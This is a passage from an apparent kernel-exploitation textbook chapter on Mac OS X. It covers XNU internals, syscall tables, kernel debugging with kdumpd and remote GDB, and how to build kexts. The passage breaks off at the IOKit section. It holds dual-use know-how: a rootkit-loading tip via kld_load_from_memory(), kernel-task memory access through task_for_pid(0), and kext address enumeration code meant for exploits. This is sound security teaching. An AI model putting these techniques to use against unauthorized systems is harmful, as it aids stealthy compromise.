Chapter 5 Mac OS X

Information in this Chapter

  • An Overview of XNU

  • Kernel Debugging

  • Kernel Extensions (Kext)

  • The Execution Step

  • Exploitation Notes

Introduction

Mac OS X is the latest incarnation of Apple's operating system. At Version 10.6.1 at the time of this writing, Mac OS X is a complete rewrite of the preceding version, Mac OS 9, and is designed with no backward compatibility in mind.

Lying at the heart of Mac OS X is the XNU kernel. XNU, which stands for “X is Not UNIX,” was developed by NeXT, a company created by Steve Jobs after he left Apple in 1985. When Apple purchased NeXT it acquired both the XNU kernel and Jobs. This is when development on Mac OS X began. The XNU source code is available for download from the Apple Open Source Web site, www.opensource.apple.com/.

Early in its life cycle, Mac OS X ran solely on the PowerPC architecture. However, by the time Version 10.5 was released in 2006, Apple decided to move to a 32-bit Intel processor, due to performance concerns with the PowerPC line. Apple accomplished this move for the most part by shipping a user-space tool named Rosetta, designed by Transitive Technologies, which could dynamically translate PowerPC compiled binaries into Intel assembly and allow them to run on the newer machines. Later, in 2008, Apple released the iPhone OS, which is essentially a pared-down version of the XNU kernel designed for ARMv6 and ARMv7-A architectures. Finally, in 2009, Apple released Mac OS X 10.6 (a.k.a. Snow Leopard), which made the switch to the Intel 64-bit architecture. This is the current state of XNU at the time of this writing. Also, Snow Leopard is not backward compatible with Mac OS X and no longer supports the (now dated) PowerPC platform. In this way, Apple was able to shrink the size of the object files that shipped with the release.

Note

We will not cover the PowerPC architecture in this chapter, mainly because Apple no longer supports it and because the authors feel it is quickly becoming much less relevant. The chapter will focus on Mac OS X Leopard, which means the 32-bit x86 architecture will be the underlying target architecture used throughout. Note that since Mac OS X Snow Leopard, by default, boots a 32-bit kernel, a lot of the discussion in this chapter still applies directly to the latest (at the time of writing) release.

Although the architecture has changed significantly between releases of Mac OS X, the underlying operating system has remained relatively unchanged through each iteration.

Tools & Traps…

Mac OS X Fat Binaries

When Mac OS X began to support the Intel architecture in Version 10.5, Apple facilitated this by adding support for a new binary format known as Universal Binary or FAT Binary. This binary format was basically a way to store multiple Mach-O files (Mach object files) on disk as one archive file, and then select the appropriate architecture when the kernel loads it. The format itself is fairly trivial to understand. It begins with a two-field fat_header structure:

struct fat_header {

uint32_t magic; /* FAT_MAGIC */

uint32_t nfat_arch; /* number of structs that follow */

};

This structure starts with the magic number (0xcafebabe) and is followed by the number of Mach-O files contained within the archive. After this header are multiple fat_arch structures:

struct fat_arch {

cpu_type_t cputype; /* cpu specifier (int) */

cpu_subtype_t cpusubtype; /* machine specifier (int) */

uint32_t offset; /* file offset to this object file */

uint32_t size; /* size of this object file */

uint32_t align; /* alignment as a power of 2 */ };

Each fat_arch structure describes the CPU type, size, and offset in the Universal Binary of each Mach-O file. At execution time, the kernel simply loads the Universal Binary from disk, parses each fat_arch structure, looking for a matching architecture type, and then begins to load the file at the specified offset.

An Overview of XNU

A common misconception about the XNU kernel is that it is a microkernel. This myth was probably perpetuated because one of the components of XNU is the Mach microkernel. However, this couldn't be further from the truth. XNU is actually larger than most other monolithic kernels because it comprises three separate components that interact with each other, all within the kernel's address space. These components are Mach, BSD, and IOKit.

Mach

The Mach component of XNU is based on the Mach 3.0 operating system developed at Carnegie Mellon University in 1985. At the time, it was designed heavily as a microkernel. However, while the operating system was being built, its developers used the 4.2BSD kernel as a shell to hold their code. As each Mach component was written, the equivalent BSD component was removed and replaced. As a result, early versions of Mach were monolithic kernels, similar to XNU, with BSD code and Mach combined. Inside XNU the Mach code is responsible for most of the lower-level functionality, such as virtual memory management (VMM), interprocess communications (IPC), preemptive multitasking, protected memory, and console I/O. Also inherent in the design of XNU are the Mach concept of tasks, rather than processes, containing several threads, and the IPC concepts of messages and ports.

Tip

You can find the Mach portion of the XNU source code in the /osfmk directory within the XNU source tree.

BSD

The BSD component of the XNU kernel is loosely based on the FreeBSD operating system. (Originally, FreeBSD 5.0 was used.) It is responsible for implementing a POSIX-compliant API (BSD system calls are implemented on top of the Mach functionality). It also implements a UNIX process model (pid/gids/pthreads) on top of the equivalent Mach concepts (task/thread). The FreeBSD virtual file system (VFS) code is also present in XNU, as well as the FreeBSD network stack.

Tip

As you would expect, the FreeBSD portion of the XNU source tree is stored in the /bsd directory.

IOKit

IOKit is the framework Apple provides for building device drivers on Mac OS X. It implements a restricted form of C++ with features removed that may cause problems in the kernel space. These include exception handling, multiple inheritance, and templating. Some of the features of IOKit include Plug and Play and power management support, as well as various other abstractions that are common among a variety of different devices.

IOKit also implements a Registry system in which all instantiated objects are tracked, as well as a catalog database of all the IOKit classes available. In the “Kernel Extensions” section of this chapter we will look at IOKit in more detail, as well as some of the utilities for manipulating the I/O Registry.

Tip

The code responsible for implementing IOKit in the XNU source tree is available in the /iokit directory.

An interesting design feature of XNU is that, rather than having the kernel and user mappings share the entire address space, the kernel is given a full address space (e.g., 4GB in the 32-bit version) of its own. This means that when a syscall takes place a full translation lookaside buffer (TLB) flush occurs. This adds quite a bit of overhead, but makes for some interesting situations. The kernel is essentially its own task/process and can be treated as such.

When the kernel is loaded into memory the first page is mapped with no access permissions. In this way, NULL pointer dereferences in the kernel space are no different from their user-space counterparts (typically nonexploitable). As far as exploitation is concerned, this also means you cannot keep your shellcode in user space and just return to it; instead, you need to store it somewhere in the kernel's address space. We will discuss this in more detail throughout this chapter.

System Call Tables

Because the XNU kernel has multiple technologies (Mach/BSD/IOKit) all tied together within Ring 0, there obviously needed to be some way to access the various components individually. Rather than compact all the system calls, service routines, and so forth from each component into one big table, the XNU developers chose to split them up into multiple tables.

The BSD system call structures (containing the function pointer and argument information, etc.) are stored, as is common on BSD operating systems, in a large array of sysent structures, known as the sysent table. The following code shows the definition of the sysent structure itself:

struct sysent {

int16_t sy_narg; /* number of arguments */

int8_t reserved; /* unused value */

int8_t sy_flags; /* call flags */

sy_call_t *sy_call; /* implementing function */

sy_munge_t *sy_arg_munge32;

sy_munge_t *sy_arg_munge64

int32_t sy_return_type; /* return type */

uint16_t sy_arg_bytes;

} *_sysent;

Each entry in this table corresponds to a particular BSD system call. The offset for each of them is available in the /usr/include/sys/syscall.h file. We will look at this in more detail throughout the chapter.

The Mach system calls (known as Mach traps) are stored in another table known as the mach_trap_table. This table is very similar to the sysent table; however, it contains an array of mach_trap_t structures which, as you can see in the following code, are almost identical to a sysent struct:

typedef struct {

int mach_trap_arg_count;

int (*mach_trap_function)(void);

#if defined(__i386__)

boolean_t mach_trap_stack;

#else

mach_munge_t *mach_trap_arg_munge32; /* system call arguments for 32-bit */

mach_munge_t *mach_trap_arg_munge64; /* system call arguments for 64-bit */

#endif

#if !MACH_ASSERT

int mach_trap_unused;

#else

const char* mach_trap_name;

#endif /* !MACH_ASSERT */

} mach_trap_t;

Depending on the platform there can be several other tables like these, used for hardware-specific system calls.

To determine which table a user-land process is trying to utilize, the kernel needs some kind of selection mechanism in its syscall calling convention. Obviously, on XNU this has changed multiple times as new hardware was utilized.

Originally, on PowerPC, the system call (SC) instruction was used to signal an entry to kernel space. The number of the desired syscall was stored in the R0 general-purpose register.

Upon entering the kernel, this number was tested. A positive number was used as an offset into the sysent table; a negative number was used to offset the mach_trap_table. In this way, the same mechanism for making system calls could be used for either Mach or BSD system calls. Other tables were referenced via high syscall numbers. For example, numbers in the range 0x6000–0x600d were used to reference PPC-specific system calls.

With the move to the Intel platform, a new system call calling convention was needed, and to combat this, the FreeBSD convention was used. This means the EAX register is used to store the syscall number to be executed. The arguments to the system call are then stored on the stack. Unlike FreeBSD, however, to indicate which type of system call needs to be executed (Mach/BSD/etc.) a separate interrupt number is used. INT 0x80 is used to indicate a FreeBSD system call to the kernel; when a Mach trap is desired the INT 0x81 instruction is used.

With the introduction of Snow Leopard (10.6.X) and Apple's corresponding move to a new platform (x64), a new calling convention was needed once more. Apple went with the SYSCALL instruction to enter kernel space. Once again, the EAX/RAX register was used to select which syscall to call. However, it also used the value 0x1000000 or 0x2000000 to indicate which system call table to use. If the 0x1000000 bit is set, the Mach trap table is used; 0x2000000 indicates that a BSD system call will be used.

Kernel Debugging

Before we can start exploiting XNU, we need a way to get some feedback on the state of the kernel. Just as we did in Chapter 4 we'll spend some time discussing the debugging options that the operating system offers.

The first option available is simply to view the report generated by CrashReporter on system reboot. Although this will probably provide us with the least possible amount of feedback, it can often be enough to work out simple issues. CrashReporter is invoked upon operating system reload after a kernel panic. When the admin user first logs in to the machine, he or she is presented with a dialog box that essentially offers two options: Ignore (and just continue with the normal startup) and Report. When you click the Report button another dialog is presented with the state of the registers and a backtrace at the time of the kernel panic. Figure 5.1 shows this second dialog box.

Image

Figure 5.1 Problem report dialog box.

As you can see, the EIP register has been set to 0xdeadbeef. However, this descriptive report is pretty much all we have and we cannot do any postmortem analysis on it.

The next step up from CrashReporter is to utilize the kdumpd daemon (in /usr/libexec/kdumpd). The kdumpd daemon is basically a hacked-up Trivial File Transfer Protocol (TFTP) daemon that runs over inetd on UDP port 1069 and simply sits and waits for information to be passed to it. When a configured machine receives a kernel panic, it opens a connection over the network to the daemon and sends a core dump. One of the advantages of using kdumpd is that you need only one Mac OS X machine. Kdumpd can be compiled on Linux, BSD, and most other POSIX-compliant platforms.

To set up kdumpd between two Mac OS X machines you simply start the kdumpd daemon on one machine and configure the other machine to use it. The first step in this process is to get kdumpd listening on one machine. On Mac OS X, simply create a directory in which to store your core dump files. Apple recommends that you accomplish this by issuing the following commands:1

-[luser@kdumpdserver]$ sudo mkdir /PanicDumps

-[luser@kdumpdserver]$ sudo chown root:wheel /PanicDumps/

-[luser@kdumpdserver]$ sudo chmod 1777 /PanicDumps/

However, if you're uncomfortable with creating a world-writable directory on your system, changing the directory's ownership to nobody:wheel and setting its permissions to 1770 should suffice. The next step is to start the daemon running. Apple provides a plist file (in /System/Library/LaunchDaemons/com.apple.kdumpd.plist) that contains default startup settings for the daemon. The daemon itself runs via xinetd. To start the daemon running you simply issue the following command:

-[luser@kdumpdserver]$ sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.kdumpd.plist

This command communicates with the launchd daemon and tells it to start the kdumpd daemon on system start. Now that our kdumpd target is set up we must configure the target machine being debugged to connect to our kdumpd server during a kernel panic. We can do this by using the nvram command to change the kernel's boot arguments, which are stored in the firmware's nonvolatile RAM. Specifically, we must populate a bit field named debug-flags to set the appropriate debugging options. Table 5.1 describes the possible values for this bit field.

Table 5.1 Toggling bits inside debug-flags allows configuration of various debugging options

Name Value Description
DB_HALT 0x01 This will halt on boot and wait for a debugger to be attached.
DB_PRT 0x02 This causes kernel printf() statements to output to the console.
DB_KPRT 0x08 This causes kernel kprintf() statements to output to the console.
DB_KDB 0x10 This selects DDB as the default kernel debugger. It is available only over a serial port interface when using a custom kernel.
DB_SLOG 0x20 This logs system diagnostic information to the syslog.
DB_KDP_BP_DIS 0x80 This supports older versions of GDB.
DB_LOG_PI_SCRN 0x100 This disables the graphical kernel panic screen.
DB_NMI 0x0004 When this is set, the Power button will generate a nonmaskable interrupt, which will break to the debugger.
DB_ARP 0x0040 This allows the kernel to ARP when trying to find the debugger to attach to. This is a security hole, but it is convenient.
DB_KERN_DUMP_ON_PANIC 0x0400 When this is set, the kernel will core-dump when a panic is triggered.
DB_KERN_DUMP_ON_NMI 0x0800 This will make the kernel core-dump when a nonmaskable interrupt is received.
DB_DBG_POST_CORE 0x1000 When this is set, the kernel will wait for a debugger after dumping core in response to a kernel panic.
DB_PANICLOG_DUMP 0x2000 When this is set, the kernel will dump a panic log rather than a full core.

A typical kdumpd configuration is to use a flag value of 0x0d44. This value means the machine will generate a core file on nonmaskable interrupt or a kernel panic; the progress of the dump will be logged to the console. It also means the kernel will use Address Resolution Protocol (ARP) to look up the IP address of the server you wish to communicate with. (As we mentioned in Table 5.1, this is a security hole, as someone else responding to the ARP can debug your kernel.)

The last detail we need is the IP address of the computer running kdumpd. This needs to be specified in the _panic_ip flag as part of the nvram boot-args variable. The finished command to set our boot-args to an appropriate value for kdumpd appears in the following code:

-[root@macosxbox]# nvram boot-args="debug=0xd44 _panicd_ip=<IP ADDRESS OF KDUMPD SYSTEM>"

Warning

If the target Mac OS X machine is running within VMware rather than natively, the nvram command will not change the boot-args. In this case, you can modify the /Library/Preferences/SystemConfiguration/com.apple.Boot.plist file to change the boot-args.

Once both computers are set up to communicate with each other when a panic occurs, the console on the panicked box displays its status as the core is uploaded to the kdumpd server. When this is complete the core should be visible in the /PanicDumps directory created earlier:

-[root@kdumpdserver:/PanicDumps]# ls

core-xnu-1228.15.4-192.168.1.100-445ae7d0

This core file is a typical Mach-O core and can be loaded and manipulated with GDB. To improve our debugging situation, it is best to first download the Kernel Debug Kit from http://developer.apple.com. This package contains symbols for the kernel as well as each kernel extension that ships with the OS. When you download the kit the kernel version in the kit must match the one being debugged. The Kernel Debug Kit is shipped as a .dmg (Mac OS X image format) file. To use it simply double-click on it and it will mount (or use the hdiutil command-line utility with the –mount flag).

Now we can fire up the debugger by specifying the mach_kernel file from the Kernel Debug Kit to use its symbols. The –c flag lets us specify the core file to use; in this case, we're using the core that was stored by kdumpd:

-[root@kdumpdserver:/PanicDumps]# gdb /Volumes/KernelDebugKit/mach_kernel -c core-xnu-1228.15.4-192.168.1.100-445ae7d0

GNU gdb 6.3.50-20050815 (Apple version gdb-1344) (Fri Jul 3 01:19:56 UTC 2009)

[…]

This GDB was configured as "x86_64-apple-darwin"…

#0 Debugger (message=0x80010033 <Address 0x80010033 out of bounds>) at /SourceCache/xnu/xnu-1228.15.4/osfmk/i386/AT386/model_dep.c:799

799 /SourceCache/xnu/xnu-1228.15.4/osfmk/i386/AT386/model_dep.c: No such file or directory.

in /SourceCache/xnu/xnu-1228.15.4/osfmk/i386/AT386/model_dep.c

The first thing we do is issue the bt backtrace command to dump the call stack and arguments for our current point of execution:

(gdb) bt

#0 Debugger (message=0x80010033 <Address 0x80010033 out of bounds>) at /SourceCache/xnu/xnu-1228.15.4/osfmk/i386/AT386/model_dep.c:799

#1 0x0012b4c6 in panic (str=0x469a98 "Kernel trap at 0x%08x, type %d=%s, registers: CR0: 0x%08x, CR2: 0x%08x, CR3: 0x%08x, CR4: 0x%08x EAX: 0x%08x, EBX: 0x%08x, ECX: 0x%08x, EDX: 0x%08x CR2: 0x%08x, EBP: 0x%08x, ESI: 0x%08x, EDI: 0x%08x E"…) at /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/debug.c:275

#2 0x001ab0fe in kernel_trap (state=0x20cc3c34) at /SourceCache/xnu/xnu-1228.15.4/osfmk/i386/trap.c:685

#3 0x001a1713 in trap_from_kernel () at pmap.h:176

#4 0xdeadbeef in ?? ()

#5 0x00190c2b in kmod_start_or_stop (id=114, start=1, data=0x44ae3a4, dataCount=0x44ae3c0) at /SourceCache/xnu/xnu- 1228.15.4/osfmk/kern/kmod.c:993

#6 0x00190efc in kmod_control (host_priv=0x5478e0, id=114, flavor=1, data=0x44ae3a4, dataCount=0x44ae3c0) at /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/kmod.c:1121

#7 0x001486f9 in _Xkmod_control (InHeadP=0x44ae388, OutHeadP=0x31a6f90) at mach/host_priv_server.c:2891

#8 0x0012d4d6 in ipc_kobject_server (request=0x44ae300) at /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/ipc_kobject.c:331

#9 0x001264fa in mach_msg_overwrite_trap (args=0x0) at /SourceCache/xnu/xnu-1228.15.4/osfmk/ipc/mach_msg.c:1623

#10 0x00198fa3 in mach_call_munger (state=0x28cab04) at /SourceCache/xnu/xnu-1228.15.4/osfmk/i386/bsd_i386.c:714

#11 0x001a1cfa in lo_mach_scall () at pmap.h:176

As you can see from the output, the core was generated from a function called Debugger, which was called from panic() in frame 1. Obviously, these are the functions associated with generating the core file, after the panic() has already occurred. Frame 4 is of interest, however, with an EIP value of 0xdeadbeef, as per our previous panic log. But how did the execution get to this point?

Frame 5 gives us a clue. The kmod_start_or_stop() function is called when a kernel module (kernel extension) is loaded or unloaded. The start argument is used as a Boolean to determine if a load or unload is occurring. In our case, it is set to true, so this is a kernel extension being loaded. The kmod_start_or_stop() function is then responsible for calling the constructor (or destructor) of the kernel extension.

To investigate this further, we can load a few more tools from the Kernel Debug Kit. The kgmacros file contains a variety of GDB macros for parsing and displaying various kernel structures and components. To load this file from GDB we issue the following command:

(gdb) source /Volumes/KernelDebugKit/kgmacros

Loading Kernel GDB Macros package. Type "help kgm" for more info.

Once this is loaded, we have around 50 additional commands we can use to probe for more information. The first command that is useful to us in this case is showcurrentthreads. This basically shows the task and thread information for each running processor.

(gdb) showcurrentthreads

Processor 0x005470c0 State 6 (cpu_id 0)

task vm_map ipc_space #acts pid proc command

0x028bc474 0x015685d0 0x0286b3c4 1 150 0x02bac6fc kextload

thread processor pri state wait_queue wait_event

0x031c2d60 0x005470c0 31 R

In this case, we can see that the command being executed is kextload. This command loads a kernel extension (kext) from disk into the kernel, so this information supports our theory that our crash took place from within the loading process of a kernel extension. To determine which one, we can use the showallkmods command to dump a list of loaded modules at the time of the crash:

(gdb) showallkmods

kmod address size id refs version name

0x20f96060 0x20f95000 0x00002000 114 0 1.0.0d1 com.yourcompany.kext.Crash

0x2bbed020 0x2bbe5000 0x00009000 113 0 2.0.0 com.vmware.kext.vmnet

0x2bb8dd60 0x2bb89000 0x00006000 112 0 2.0.0 com.vmware.kext.vmioplug

0x2ba811e0 0x2ba77000 0x0000b000 111 0 2.0.0 com.vmware.kext.vmci

0x2ba9eda0 0x2ba8f000 0x000d2000 110 0 2.0.0 com.vmware.kext.vmx86

In the preceding output, you can see that the latest kernel extension loaded was com.yourcompany.kext.Crash. So, it stands to reason that this is the location of the code that triggered the panic.

Note

To see a complete list of macros imported by the kgmacros file simply run the help kgm command after issuing the source command from earlier.

The next step in analyzing this vulnerability is to attach GDB (the GNU Debugger) to the kernel directly over the network.A To do this, first we have to set the nvram boot-args variable to allow remote debugging. This time we set the debug value to 0x44 (DB_ARP | DB_NMI). This is achieved via a similar nvram command to the one shown earlier:

-[root@macosxbox]# nvram boot-args="debug=0x44"

After a reboot, we are ready to go and we start by briefly pressing the Power button on our newly set up box. This generates a nonmaskable interrupt and causes the kernel to wait for a debugger connection. Next, we instantiate GDB on our debugger box and pass it the mach_kernel from the Kernel Debug Kit to use the correct symbols. The target command can be used to specify remote-kdp as the protocol for remote debugging. After this, it's simply a matter of typing attach followed by the IP address of the waiting machine:

-[root@remotegdb:~/]# gdb /Volumes/KernelDebugKit/mach_kernel

(gdb) target remote-kdp

(gdb) attach <ip address of target>

Connected.

(gdb) c

Continuing.

Now the actual debugging starts. Let's put a breakpoint on the kmod_start_or_stop() function from the kdumpd backtrace we saw earlier:

Program received signal SIGTRAP, Trace/breakpoint trap.

0x001b0b60 in ?? ()

(gdb) break kmod_start_or_stop

Breakpoint 1 at 0x190b5f: file /SourceCache/xnu/xnu- 1228.15.4/osfmk/kern/kmod.c, line 957.

(gdb) c

Continuing.

At this point, we can re-create the issue on the vulnerable box (loading our Crash kext). Immediately, we hit our breakpoint:

Breakpoint 1, kmod_start_or_stop (id=114, start=1, data=0x3ead6a4, dataCount=0x3ead6c0) at /SourceCache/xnu/xnu- 1228.15.4/osfmk/kern/kmod.c:957

957 /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/kmod.c: No such file or directory.

in /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/kmod.c

(gdb) bt

#0 kmod_start_or_stop (id=114, start=1, data=0x3ead6a4, dataCount=0x3ead6c0) at /SourceCache/xnu/xnu- 1228.15.4/osfmk/kern/kmod.c:957

#1 0x00190efc in kmod_control (host_priv=0x5478e0, id=114, flavor=1, data=0x3ead6a4, dataCount=0x3ead6c0) at /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/kmod.c:1121

#2 0x001486f9 in _Xkmod_control (InHeadP=0x3ead688, OutHeadP=0x3f1f090) at mach/host_priv_server.c:2891

#3 0x0012d4d6 in ipc_kobject_server (request=0x3ead600) at /SourceCache/xnu/xnu-1228.15.4/osfmk/kern/ipc_kobject.c:331

#4 0x001264fa in mach_msg_overwrite_trap (args=0x1) at /SourceCache/xnu/xnu-1228.15.4/osfmk/ipc/mach_msg.c:1623

#5 0x00198fa3 in mach_call_munger (state=0x25a826c) at /SourceCache/xnu/xnu-1228.15.4/osfmk/i386/bsd_i386.c:714

#6 0x001a1cfa in lo_mach_scall () at pmap.h:176

When a kernel extension is loaded a kmod_info structure is instantiated that contains information about the kernel extension. By stepping through the function until the kmod_info struct k is populated, we can use GDB's print command to display the structure:

(gdb) print (kmod_info) *k

$2 = {

next = 0x227f5020,

info_version = 1,

id = 114,

name = "com.yourcompany.kext.Crash", '' <repeats 37 times>,

version = "1.0.0d1", '' <repeats 56 times>,

reference_count = 0,

reference_list = 0x29e71c0,

address = 563466240,

size = 8192,

hdr_size = 4096,

start = 0x2195e018,

stop = 0x2195e02c

}

Now we can break on the start() function (which is called on module initialization):

(gdb) break *k->start

Breakpoint 2 at 0x2195e018

After this breakpoint is hit, we dump the next 10 instructions using the examine command:

(gdb) x/10i $pc

0x2195e018: push %ebp

0x2195e019: mov 0x2195e048,%ecx

0x2195e01f: mov %esp,%ebp

0x2195e021: test %ecx,%ecx

0x2195e023: je 0x2195e028

0x2195e025: leave

0x2195e026: jmp *%ecx

[…]

We can easily spot that the code simply calls a function pointer in ECX (jmp *%ecx). That means control will be transferred to whatever ECX holds. At this point, it's worth it for us to take a look at the value of ECX, which we can do with the info register command:

(gdb) i r ecx

ecx 0x2195e000 563470336

Execution will be transferred to this address. Let's dump 10 instructions here:

(gdb) x/10i $ecx

0x2195e000: push %ebp

0x2195e001: mov $0xdeadbeef,%eax

0x2195e006: mov %esp,%ebp

0x2195e008: sub $0x8,%esp

0x2195e00b: call *%eax

0x2195e00d: xor %eax,%eax

0x2195e00f: leave

0x2195e010: ret

Here goes our 0xdeadbeef value! The value is copied into EAX; then the stack is set up and a call is made to the address contained in EAX. The exception we got at the start now makes a lot of sense. In fact, when we continue the execution, we receive a SIGTRAP:

(gdb) c

Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.

0xdeadbeef in ?? ()

Although we showed only a simple example here, it should give you a good idea of how invaluable it can be to debug the kernel using this setup. We will use this setup through the rest of this chapter.

Although GDB can be an excellent tool for investigating the state of the kernel, sometimes during exploitation you may want more programmatic control over the debugging interface. In this case, it can be useful to know that, because the kernel on Mac OS X is just another Mach task, all the typical functions you would use to interact with memory (vm_read()/vm_write()/vm_allocate()/etc.) will work cleanly on the kernel task. To get send rights to the kernel task's port, you can use the task_for_pid() function with a PID of 0. We will not show an example here, since many documents on the Mach debugging interface are available online.

Kernel Extensions (Kext)

Since XNU is a modular kernel (it supports loadable kernel modules), a file format is needed for storing these modules on disk. To accomplish this, Apple developed the kext format. On Mac OS X, most of the kernel extensions the system uses are stored in /System/Library/Extensions. Rather than a single file, a kernel extension (.kext) is a directory containing several files. Most importantly, it contains the loadable object file itself (in Mach-O format); however, it also typically includes an XML file (Info.plist) explaining how the kext is linked, and how it should be loaded.

The directory structure of a kernel extension typically looks as follows:

./Contents

./Contents/Info.plist

./Contents/MacOS

./Contents/MacOS/<Name of Binary>

./Contents/Resources

./Contents/Resources/English.lproj

./Contents/Resources/English.lproj/InfoPlist.strings

As we mentioned at the beginning of this section, the Info.plist file is simply an XML file containing information about how to load the kext. Table 5.2 lists some common properties of this file.

Table 5.2 Common Info.plist properties

Property Description
CFBundleExecutable Specifies the name of the executable file within the Contents/MacOS directory.
CFBundleDevelopmentRegion Specifies the region the kext was created in—for example, “English”.
CFBundleIdentifier A unique identifier used to represent this kernel extension—for example, com.apple.filesystems.smbfs.
CFBundleName The name of the kernel extension.
CFBundleVersion The kernel extension's bundle version.
OSBundleLibraries A dictionary of libraries that are linked with the kernel extension.

Here is an extract from the .plist file from the smbfs kernel extension distributed with Mac OS X:

<?xml version="3.0" encoding="UTF-8"?>

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" " http://www.apple.com/DTDs/PropertyList-1.0.dtd ">

<plist version="1.0">

<dict>

<key>CFBundleDevelopmentRegion</key>

<string>English</string>

<key>CFBundleExecutable</key>

<string>smbfs</string>

<key>CFBundleIdentifier</key>

<string>com.apple.filesystems.smbfs</string>

<key>CFBundleInfoDictionaryVersion</key>

<string>6.0</string>

<key>CFBundleName</key>

<string>smbfs</string>

<key>CFBundlePackageType</key>

<string>KEXT</string>

<key>CFBundleShortVersionString</key>

<string>1.4.6</string>

<key>CFBundleSignature</key>

<string>????</string>

<key>CFBundleVersion</key>

<string>1.4.6</string>

<key>OSBundleLibraries</key>

<dict>

<key>com.apple.kpi.bsd</key>

<string>9.0.0</string>

<key>com.apple.kpi.iokit</key>

<string>9.0.0</string>

<key>com.apple.kpi.libkern</key>

<string>9.0.0</string>

<key>com.apple.kpi.mach</key>

<string>9.0.0</string>

<key>com.apple.kpi.unsupported</key>

<string>9.0.0</string>

</dict>

</dict>

</plist>

As you can see, it's a fairly simple XML document containing the fields described in Table 5.2.

The easiest way to create your own kernel extension is to use the Xcode IDE from Apple to generate a project for it. To do this, simply fire up the Xcode application and select New Project from the File menu. Then select the Kernel Extension menu and click on Generic Kernel Extension, as shown in Figure 5.2.

Image

Figure 5.2 Creating a new kernel extension from Xcode

As you can see in Figure 5.2, Xcode will generate the appropriate files for starting a variety of projects.

Note

Selecting IOKit Driver from the menu shown in Figure 5.2 will result in the IOKit libraries being linked with your kext.

Once this process is finished, the Xcode IDE fires up and presents us with a dialog window that lists the files associated with our new project. Xcode will automatically generate the Info.plist and InfoPlist.strings files we need; however, before we can build our kernel extension we must edit the Info.plist file to show which libraries we plan to use, as shown in Figure 5.3.

Image

Figure 5.3 Adding libraries to an Info.plist file.

The circled area in Figure 5.3 shows the most common frameworks (com.apple.kpi.bsd and com.apple.kpi.libkern) added to our .plist file. We can add additional libraries, but for the sake of our simple example, these are the only libraries we need.

Obviously, we need to add some code to our kext's source file for it to actually do something. Xcode will add start() and stop() functions for our kext by default. The start() function is executed when the kernel extension is loaded and the stop() function is executed when the kernel extension is unloaded. Our simple HelloWorld kext code will look like this:

#include <mach/mach_types.h>

kern_return_t HelloWorld_start (kmod_info_t *ki, void *d) {

printf("Hello, World ");

return KERN_SUCCESS;

}

kern_return_t HelloWorld_stop(kmod_info_t * ki, void * d) {

printf("Goodby, World! ");

return KERN_SUCCESS;

}

Once our kernel extension is set up, we can simply click the Build button and Xcode will invoke the GNU Compiler Collection (GCC) and compile our code. Before we can load our newly created kernel extension, however, we must change the file permissions on our binary. When loading kernel extensions Mac OS X requires that the file be owned by root:wheel and that none of the files within the kext directory be writable or executable by group or other. After we change the file permissions per Mac OS X requirements, we can utilize the kextload command to load our kernel into kernel space. This application uses the KLD API (implemented in libkld.dylib) to load the kernel extension from disk into kernel memory.

-[root@macosxbox:]$ kextload HelloWorld.kext

kextload: HelloWorld.kext loaded successfully

The usage is very straightforward, and our kernel extension has loaded correctly. If we use the tail command to view the last entry in the system log, we can see that our kernel extension's start function has been called as expected and our “Hello, World!” output has been displayed:

-[root@macosxbox]$ tail −n1 /var/log/system.log

Nov 17 13:50:14 macosxbox kernel[0]: Hello, World!

We can reverse this process and unload our kernel extension with the kextunload command, in this case executing kextunload HelloWorld.kext.

Tools & Traps…

The KLD API

Both kextload and kextunload utilize the KLD API to accomplish their tasks.

The KLD API has two purposes. First, it allows for kernel extensions to be loaded from user space into the kernel. The libkld.dylib user-space library is responsible for implementing this functionality. There are several functions for loading different object files from disk into kernel memory, among them kld_load() and kld_load_basefile(). The library also implements the ability to load a kernel extension directly from user-space memory into the kernel. This is accomplished using the kld_load_from_memory() function. This can be useful for attackers who want to avoid forensic analysis. By exploiting a process remotely over the network, gaining root privileges, and then calling kld_load_from_memory(), an attacker can easily install his or her kernel extension-based rootkit on the machine without touching the disk.

The second function of the KLD API is the ability to allow the kernel to load required boot-time drivers. In this case, the kernel calls the functions responsible for loading the kernel extension directly. It is useful to know that you can load additional kernel extensions from within kernel space.

It is also possible to query the state of all the kernel extensions mapped into the kernel as an unprivileged user, as well as their load address, size, and other useful information. You can do this either by using the kextstat command-line utility that dumps each kernel extension in a readable format (as shown in the following code), or by using the Mach kmod_get_info() API to programmatically query the same information.

Index Refs Address Size Wired Name (Version) <Linked Against>

12 19 0x0 0x0 0x0 com.apple.kernel.6.0 (7.9.9)

13 1 0x0 0x0 0x0 com.apple.kernel.bsd (7.9.9)

14 1 0x0 0x0 0x0 com.apple.kernel.iokit (7.9.9)

15 1 0x0 0x0 0x0 com.apple.kernel.libkern (7.9.9)

16 1 0x0 0x0 0x0 com.apple.kernel.mach (7.9.9)

17 18 0x5ce000 0x11000 0x10000 com.apple.iokit.IOPCIFamily (2.6) <7 6 5

The Mach interface to query this information is pretty straightforward and can be useful for automating the process inside an exploit. It is just a matter of calling the kmod_get_info() function and passing in the address of a kmod_info struct pointer. This pointer is then updated to a freshly allocated list of kmods on the system. Here is a snippet of code that prints output similar to the kextstat program. As usual, the code in its entirety is available online at www.attackingthecore.com.

int

main (int ac, char **av)

{

mach_port_t task;

kmod_info_t *kmods;

unsigned int nokexts;

task = mach_host_self();

if ((kmod_get_info (task, (void *) &kmods, &nokexts) != KERN_SUCCESS)){

printf("error: could not retrieve list of kexts. ");

return 1;

}

for (; kmods; kmods = (kmods->next) ? (kmods + 1): NULL)

printf ("- Name: %s, Version: %s, Load Address: 0x%08x Size: 0x%x ", kmods->name, kmods->version, kmods->address, kmods- >size);

return 0;

}

IOKit

When writing device drivers on Mac OS X, developers generally utilize an API known as IOKit. An object-oriented framework, IOKit implements a limited version of C++ derived from Embedded C++. The implementation of this is in the libkern/ directory of the XNU source tree. This implementation of C++ has runtime-type information, multiple inheritance, templating, and exception handling removed.

Note

